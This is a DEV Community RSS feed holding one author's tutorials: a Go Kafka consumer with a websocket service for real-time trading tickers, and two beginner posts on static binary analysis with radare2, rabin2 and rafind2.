<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Kamalesh-Seervi</title>
    <description>The latest articles on DEV Community by Kamalesh-Seervi (@kamaleshseervi).</description>
    <link>https://dev.to/kamaleshseervi</link>
    
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/kamaleshseervi"/>
    <language>en</language>
    <item>
      <title>Real-Time Trading App: Golang, Kafka, Websockets — Setting up Consumer &amp; Websockets(PART-3)</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Thu, 04 Jan 2024 13:40:48 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/real-time-trading-app-golang-kafka-websockets-setting-up-consumer-websocketspart-3-177k</link>
      <guid>https://dev.to/kamaleshseervi/real-time-trading-app-golang-kafka-websockets-setting-up-consumer-websocketspart-3-177k</guid>
      <description>&lt;h3&gt;
  
  
  &lt;strong&gt;Real-Time Trading App: Golang, Kafka, Websockets — Setting up Consumer &amp;amp; Websockets(PART-3)&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Step-by-step guide on configuring a Kafka consumer in Golang for real-time data processing.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--INRuGOui--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/660/0%2AE22oQGrg5j215OaI.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--INRuGOui--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/660/0%2AE22oQGrg5j215OaI.png" alt="golang" width="660" height="494"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;PART-3&lt;/em&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  &lt;strong&gt;Creating Consumer Service &amp;amp; Websockets&lt;/strong&gt;
&lt;/h4&gt;

&lt;blockquote&gt;
&lt;p&gt;In this ongoing series, we’ve delved into the introductory aspects of our tech stack and explored the high-level architecture. Our journey began with the implementation of a producer service using Kafka and Golang. Having accomplished this initial phase, the focus now shifts to the creation of a consumer service. We will delve into the process of actively listening for Kafka events and seamlessly transmitting real-time ticker data to the frontend using websockets.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Why did we choose to employ websockets instead of directly integrating Kafka on the frontend?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;In the initial post, it was highlighted that Kafka lacks substantial support for web browsers due to various reasons. Notably, Kafka primarily utilizes TCP, and browsers tend to keep TCP connections open for very brief durations. Additionally, Kafka’s distribution policy, where messages are spread across consumers, poses a challenge when each browser tab is treated as a separate consumer. This distribution not only affects tabs but also extends to other devices consuming the data.&lt;/li&gt;
&lt;li&gt;Moreover, Kafka consumers demand a significant amount of resources to manage offsets, message reads, and overall states. In contrast, websockets offer a lightweight alternative. This brief explanation serves as a justification for opting to use websockets to efficiently deliver real-time data to the frontend. Now, let’s delve into the implementation details of the consumer side.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;
  
  
  &lt;strong&gt;Folder Structure:&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--nwpfzkxS--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A4PzdaxQCzT7j3huRllL-2w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--nwpfzkxS--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A4PzdaxQCzT7j3huRllL-2w.png" alt="" width="800" height="416"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  &lt;strong&gt;core/settings.go&lt;/strong&gt;
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package core

import (
 "fmt"
 "log"
 "os"
 "strings"

 "github.com/joho/godotenv"
)

var TICKERS []string
var KAFKA_HOST string
var KAFKA_PORT string

func Load() {

 err := godotenv.Load("../.env")
 if err != nil {
  log.Fatal("Failed to load environment file")
 }
 t := os.Getenv("TICKERS")
 TICKERS := strings.Split(t, ",")
 LoadTikers(TICKERS)

 KAFKA_HOST = "127.0.0.1"
 KAFKA_PORT = "9092"
 fmt.Println(TICKERS)
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;core/ticker.go&lt;/strong&gt;
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package core

import "strings"

var tickerSet map[string]struct{}

func GetAllTickers() []string {
 tickerList := []string{}
 for key := range tickerSet {
  tickerList = append(tickerList, key)
 }
 return tickerList
}

func IsTickerAllowed(ticker string) bool {
 _, ok := tickerSet[strings.ToLower(ticker)]
 return ok
}

func LoadTikers(tickers []string) {
 if tickerSet == nil {
  tickerSet = make(map[string]struct{})
 }
 for _, t := range tickers {
  tickerSet[strings.ToLower(strings.Trim(strings.Trim(t, "\\"), "\""))] = struct{}{}
 }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;In our &lt;strong&gt;main.go&lt;/strong&gt; file, the &lt;strong&gt;settings.go&lt;/strong&gt; module serves the purpose of loading all environment variables, ensuring a streamlined configuration process. On the other hand, &lt;strong&gt;ticker.go&lt;/strong&gt; houses a comprehensive set of tickers and functions that will prove instrumental in upcoming stages of our implementation.&lt;/p&gt;

&lt;p&gt;Now, let’s integrate and configure these components within our  &lt;strong&gt;main.go&lt;/strong&gt;.&lt;/p&gt;
&lt;h4&gt;
  
  
  Initial code for main.go
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package main

import (
 "github.com/gin-contrib/cors"
 "github.com/gin-gonic/gin"
 "github.com/kamalesh-seervi/consumer/api"
 "github.com/kamalesh-seervi/consumer/core"
)

func main() {
 core.Load()
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Keeping it simple, we incorporate core.Load() in our main.go to ensure the environment file is loaded seamlessly. As a quick check, let's print the tickers using&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;fmt.Println(core.GetAllTickers())
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Now lets build is the API and Websocket Connection:
&lt;/h3&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;api/ticker.go&lt;/strong&gt;
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package api

import (
 "context"
 "fmt"
 "log"
 "strings"

 "github.com/gin-gonic/gin"
 "github.com/gorilla/websocket"
 "github.com/segmentio/kafka-go"

 "github.com/kamalesh-seervi/consumer/core"
)

func GetAllTickers(c *gin.Context) {
 c.JSON(200, core.GetAllTickers())
}

func ListenTicker(c *gin.Context) {
 conn, err := websocket.Upgrade(c.Writer, c.Request, nil, 1024, 1024)
 if err != nil {
  log.Println("WebSocket Upgrade Error: ", err)
  return
 }
 defer conn.Close()

 currTicker := c.Param("ticker")
 log.Println("Current ticker: ", currTicker)

 if !core.IsTickerAllowed(currTicker) {
  conn.WriteMessage(websocket.CloseUnsupportedData, []byte("Ticker is not allowed"))
  log.Println("Ticker not allowed ticker: ", currTicker)
  return
 }

 topic := "trades-" + strings.ToLower(currTicker)
 reader := kafka.NewReader(kafka.ReaderConfig{
  Brokers: []string{core.KAFKA_HOST + ":" + core.KAFKA_PORT},
  Topic: topic,
 })
 reader.SetOffset(-1)
 defer reader.Close()

 conn.SetCloseHandler(func(code int, text string) error {
  reader.Close()
  log.Printf("Received connection close request. Closing connection .....")
  return nil
 })

 go func() {
  code, wsMessage, err := conn.NextReader()
  if err != nil {
   log.Println("Error reading last message from WS connection. Exiting ...")
   return
  }
  fmt.Printf("CODE : %d MESSAGE : %s\n", code, wsMessage)
 }()

 for {
  message, err := reader.ReadMessage(context.Background())
  if err != nil {
   log.Println("Error: ", err)
   return
  }
  fmt.Println("Reading..... ", string(message.Value))

  err = conn.WriteMessage(websocket.TextMessage, message.Value)
  if err != nil {
   log.Println("Error writing message to WS connection: ", err)
   return
  }
 }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Let’s break down the functionality of the&lt;/strong&gt;  &lt;strong&gt;ListenTicker function:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;WebSocket Upgrade:&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;ul&gt;
&lt;li&gt;The function begins by attempting to upgrade the HTTP connection to a WebSocket connection using websocket.Upgrade.&lt;/li&gt;
&lt;li&gt;If the upgrade fails, an error is logged, and the function returns.&lt;/li&gt;
&lt;/ul&gt;

&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Parameters and Ticker Validation:&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;ul&gt;
&lt;li&gt;The current ticker is extracted from the request parameters.&lt;/li&gt;
&lt;li&gt;The function checks if the current ticker is allowed using the core.IsTickerAllowed function.&lt;/li&gt;
&lt;li&gt;If the ticker is not allowed, a message is sent to the WebSocket client indicating that the ticker is not allowed, and the function returns.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;3. Kafka Topic Configuration:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A Kafka topic is constructed based on the lowercase version of the current ticker.&lt;/li&gt;
&lt;li&gt;A Kafka reader is created using the kafka.NewReader function, configured with the Kafka broker information and topic.&lt;/li&gt;
&lt;li&gt;The reader’s offset is set to -1 to read messages from the latest available.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;4. WebSocket Connection Configuration:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A close handler is set on the WebSocket connection to handle closure events. It ensures that the Kafka reader is closed when the WebSocket connection is closed.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;5. Goroutine for Handling WebSocket Messages:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A goroutine is launched to handle WebSocket messages. It reads the last message from the WebSocket connection, logs the details, and exits.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;6. Reading Kafka Messages and Broadcasting to WebSocket:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The function enters a loop where it continuously reads messages from the Kafka topic using reader.ReadMessage.&lt;/li&gt;
&lt;li&gt;Each Kafka message is then written to the WebSocket connection using conn.WriteMessage.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;7. Error Handling:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Errors during the WebSocket message reading or writing process are logged.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Now let’s link all this and expose ws and api connections.&lt;/strong&gt;
&lt;/h4&gt;

&lt;h4&gt;
  
  
  api/routing.go
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package api

import (
 "github.com/gin-contrib/cors"
 "github.com/gin-gonic/gin"
)

func AddRoutes(router *gin.Engine) {
 router.Use(cors.Default())

 apiV1 := router.Group("/api/v1")
 {
  apiV1.GET("/tickers", GetAllTickers)
 }

 // WebSocket route
 router.GET("/ws/trades/:ticker", func(c *gin.Context) {
  if c.Request.Header.Get("Upgrade") != "websocket" {
   c.JSON(400, gin.H{"error": "WebSocket upgrade required"})
   return
  }

  // Specific WebSocket logic here
  ListenTicker(c)
 })
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  &lt;strong&gt;Final main.go&lt;/strong&gt;
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package main

import (
 "github.com/gin-contrib/cors"
 "github.com/gin-gonic/gin"
 "github.com/kamalesh-seervi/consumer/api"
 "github.com/kamalesh-seervi/consumer/core"
)

func main() {
 core.Load()
 router := gin.Default()

 // CORS middleware
 config := cors.DefaultConfig()
 config.AllowOrigins = []string{"*"}
 config.AllowMethods = []string{"GET", "POST", "HEAD", "PUT", "DELETE", "PATCH", "OPTIONS"}
 config.AllowHeaders = []string{"Origin", "Content-Type", "Accept", "Content-Length", "Accept-Language", "Accept-Encoding", "Connection", "Access-Control-Allow-Origin"}
 config.AllowCredentials = true
 router.Use(cors.New(config))

 // Add routes

 api.AddRoutes(router)

 // Start server
 router.Run(":8000")
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Open your web browser and navigate to the URL &lt;strong&gt;127.0.0.1:8000/api/v1/tickers&lt;/strong&gt;. You will receive a response similar to the following.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--9jWY0utR--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Avy0s4MCPTRYo6wlMtgAOMg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--9jWY0utR--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Avy0s4MCPTRYo6wlMtgAOMg.png" alt="" width="800" height="328"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Tickers&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Before proceeding, ensure that you have built the producer service and confirmed that it is actively running to facilitate data pushing to Kafka. If you are running the service with Docker, remember to update the  &lt;strong&gt;.env&lt;/strong&gt; file, replacing &lt;strong&gt;127.0.0.1&lt;/strong&gt; with &lt;strong&gt;kafka&lt;/strong&gt;. If you are running it locally, you can disregard this step.&lt;/p&gt;

&lt;p&gt;To swiftly execute this, use the provided command.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo docker-compose up -d 
&amp;amp;
Run Both producer and consumer build files.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Now let’s test the web socket stream.
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--lPV2M3c4--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AReSDwjhFWaJxx6_1HgVxZQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--lPV2M3c4--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AReSDwjhFWaJxx6_1HgVxZQ.png" alt="" width="" height=""&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Websocket stream&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--vaQeOrCt--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AZ_kLV4v136ply6yC_rVNHA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--vaQeOrCt--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AZ_kLV4v136ply6yC_rVNHA.png" alt="" width="800" height="419"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Consumer Live read data&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;If you successfully receive the data, your backend is now seamlessly linked to Kafka.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;With this, we are approaching the final stages. The data flows from the backend to the frontend, and in the upcoming article, we will delve into visualizing and interpreting the data using charts to better understand its dynamics.&lt;/p&gt;

&lt;h3&gt;
  
  
  Conclusion
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;In conclusion, this series of articles has guided us through the establishment of a robust tech stack and a well-designed high-level architecture. We initiated the implementation with the creation of a producer service, integrating Kafka and Golang for efficient data transmission. The decision to employ websockets on the frontend was motivated by the limitations of directly using Kafka in browsers, considering factors such as TCP connection handling and resource utilization.&lt;/p&gt;

&lt;p&gt;With the backend successfully linked to Kafka, we now have a functional system where data flows seamlessly from the producer service to the frontend through websockets. The backend is not only capable of fetching real-time data but also validating and broadcasting it to connected clients.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://github.com/Kamalesh-Seervi/Real-time-trade-app"&gt;GitHub - Kamalesh-Seervi/Real-time-trade-app: Kafka, WebSockets&lt;/a&gt;&lt;/p&gt;

</description>
      <category>trading</category>
      <category>softwaredevelopment</category>
      <category>go</category>
      <category>kafka</category>
    </item>
    <item>
      <title>Radare2 — Cross-References, Static Analysis, and Binary Information Retrieval (Part 2–3)</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Sat, 23 Dec 2023 16:05:20 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/radare2-cross-references-static-analysis-and-binary-information-retrieval-part-2-3-41em</link>
      <guid>https://dev.to/kamaleshseervi/radare2-cross-references-static-analysis-and-binary-information-retrieval-part-2-3-41em</guid>
      <description>&lt;h3&gt;
  
  
  Radare2 — Cross-References, Static Analysis, and Binary Information Retrieval (Part 2–3)
&lt;/h3&gt;

&lt;p&gt;Navigating the Depths of Binary Analysis: Advanced Techniques and Insightful Information Extraction&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--JqwJw34i--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AODxpImjBe3mHKBWSuzZLEA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--JqwJw34i--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AODxpImjBe3mHKBWSuzZLEA.png" alt="radare2" width="800" height="579"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Static analysis &amp;amp; Binary Information&lt;/em&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  Cross Reference Insights
&lt;/h3&gt;

&lt;p&gt;Discover the power of axt and axf commands for comprehensive cross-reference analysis. Uncover the relationships within the binary and understand its structure with these advanced tools.&lt;/p&gt;
&lt;h3&gt;
  
  
  Static Analysis Unveiled
&lt;/h3&gt;
&lt;h3&gt;
  
  
  Import and Export Libraries
&lt;/h3&gt;

&lt;p&gt;Use ii to reveal import libraries and iE for exports. Unravel the binary's dependencies and interactions by deciphering its import and export components.&lt;/p&gt;
&lt;h3&gt;
  
  
  Strings Analysis
&lt;/h3&gt;

&lt;p&gt;Unearth hidden insights with the is command, revealing strings embedded within the binary. This crucial step unveils textual elements that provide valuable context and clues about the binary's functionality.&lt;/p&gt;
&lt;h3&gt;
  
  
  Getting In-Depth Binary Information
&lt;/h3&gt;
&lt;h3&gt;
  
  
  Rabin2: Your Binary Information Swiss Army Knife
&lt;/h3&gt;

&lt;p&gt;Leverage the power of rabin2 to obtain detailed information about the binary. From basic details to hexadecimal representations, rabin2 provides a wealth of insights.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;To get basic binary information:
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;rabin2 -I ./letter_frequencies
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--S4lvE7Q6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AfnPx6WlfLuGbzC0f" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--S4lvE7Q6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AfnPx6WlfLuGbzC0f" alt="" width="800" height="629"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Hexadecimal view of the binary:
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;rabin2 -H ./letter_frequencies
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--SDwSwsYr--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AgTIX_tEbjkql3wzP1m8dzg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SDwSwsYr--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AgTIX_tEbjkql3wzP1m8dzg.png" alt="" width="800" height="492"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Extracting strings with the zz tag:
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;rabin2 -zz ./letter_frequencies
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--hS4W6DEB--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AcpNfG0hUSBTh5gW66MV-hA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--hS4W6DEB--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AcpNfG0hUSBTh5gW66MV-hA.png" alt="" width="800" height="492"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  Rafind2: Advanced String Search
&lt;/h3&gt;

&lt;p&gt;Move beyond simple string searches with rafind2. This advanced tool allows for intricate string analysis within binary files, providing a more nuanced approach to information retrieval.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;rafind2 -s frequencies ./letter_frequencies
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--wFYW90sH--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Ab56vcewTsJV1Wqy2MhD5Dw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--wFYW90sH--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Ab56vcewTsJV1Wqy2MhD5Dw.png" alt="" width="800" height="492"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Loading Headers
&lt;/h3&gt;

&lt;p&gt;Learn to navigate binary headers with ease using commands like r2 -nn ./letter_frequencies, pf., and pf.elf_header @ elf_header. Understand the binary's structure and gain a deeper appreciation for its complexity.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--923gTY6T--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A5YGjmeCMSpZztzPVwSrqeQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--923gTY6T--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A5YGjmeCMSpZztzPVwSrqeQ.png" alt="" width="800" height="540"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Conclusion:
&lt;/h4&gt;

&lt;blockquote&gt;
&lt;p&gt;In conclusion, our exploration of Radare2’s capabilities in binary analysis has unveiled a powerful set of tools for cross-referencing, static analysis, and binary information retrieval. Through commands like &lt;strong&gt;axt&lt;/strong&gt; , &lt;strong&gt;ii&lt;/strong&gt; , and &lt;strong&gt;iE&lt;/strong&gt; , we’ve navigated the intricacies of cross-references, dissected import and export libraries, and revealed critical strings within the binary.&lt;/p&gt;

&lt;p&gt;Leveraging &lt;strong&gt;rabin2&lt;/strong&gt; and &lt;strong&gt;rafind2&lt;/strong&gt; has provided us with comprehensive insights into the binary’s structure, offering detailed information and advanced string search capabilities. As we conclude this segment, the journey continues with an anticipation of further revelations in dynamic analysis and more advanced techniques in the upcoming parts of this series.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Stay tuned for a deeper dive into the fascinating world of binary analysis with Radare2!&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://github.com/Kamalesh-Seervi/radare2/tree/main"&gt;GitHub - Kamalesh-Seervi/radare2&lt;/a&gt;&lt;/p&gt;

</description>
      <category>reverseengineering</category>
      <category>binaryoptions</category>
      <category>cybersecurity</category>
      <category>ctf</category>
    </item>
    <item>
      <title>Static Navigation Disassembly with Radare2 — PART-1</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Thu, 21 Dec 2023 15:59:11 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/static-navigation-disassembly-with-radare2-part-1-4end</link>
      <guid>https://dev.to/kamaleshseervi/static-navigation-disassembly-with-radare2-part-1-4end</guid>
      <description>&lt;h3&gt;
  
  
  Static Navigation Disassembly with Radare2 — PART-1
&lt;/h3&gt;

&lt;p&gt;To delve into the static analysis of binaries using Radare2, follow these fundamental commands:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--L0CGjWaY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AD2oiS0iMtUHr9oAVbyN2TA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--L0CGjWaY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AD2oiS0iMtUHr9oAVbyN2TA.png" alt="radare2" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Radare2 Beginner Guide
&lt;/h3&gt;

&lt;p&gt;I’ve outlined a 10-part plan to facilitate learning. Each part is accompanied by a dedicated folder containing a comprehensive README file for better understanding.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/Kamalesh-Seervi/radare2/tree/main"&gt;GitHub - Kamalesh-Seervi/radare2&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Radare2 consists of an hexadecimal editor (radare) with a wrapped IO layer supporting multiple backends for local/remote files, debugger (OS X, BSD, Linux, W32), stream analyzer, assembler/disassembler (rasm) for various architectures, code analysis modules, and scripting facilities. Additional tools include radiff (bindiffer), rax (base converter), rasc (shellcode development helper), rabin (binary information extractor), and rahash (block-based hash utility).&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Installation:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo apt install radare2
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Running a Binary
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Check my github link above to get the binary files.&lt;/li&gt;
&lt;li&gt;To execute a binary file in Radare2, use the following command:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;r2 ./letter_frequencies
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After executing the command, the Seek commander will be activated.&lt;/p&gt;

